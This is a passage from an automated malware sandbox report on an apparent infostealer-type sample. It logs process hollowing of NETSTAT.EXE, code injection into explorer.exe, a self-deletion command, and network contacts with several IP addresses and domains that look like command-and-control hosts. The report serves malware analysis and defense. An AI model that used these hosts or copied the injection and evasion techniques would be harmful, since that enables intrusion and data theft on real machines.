          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03461DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03450050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03450050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03501074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03504015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03504015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.21 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.34.228.66 80
          Source: C:\Windows\explorer.exeDomain query: www.sh-zzjy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.241.53.248 80
          Source: C:\Windows\explorer.exeNetwork Connect: 46.137.146.55 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.143.9.211 80
          Source: C:\Windows\explorer.exeDomain query: www.nirvananaturalcbd.net
          Source: C:\Windows\explorer.exeDomain query: www.boicity.com
          Source: C:\Windows\explorer.exeDomain query: www.zrcezzfdfkyjlir.com
          Source: C:\Windows\explorer.exeDomain query: www.iafzal.com
          Source: C:\Windows\explorer.exeDomain query: www.updates-app.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeMemory written: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: BB0000
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
          Source: explorer.exe, 00000005.00000000.731475226.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
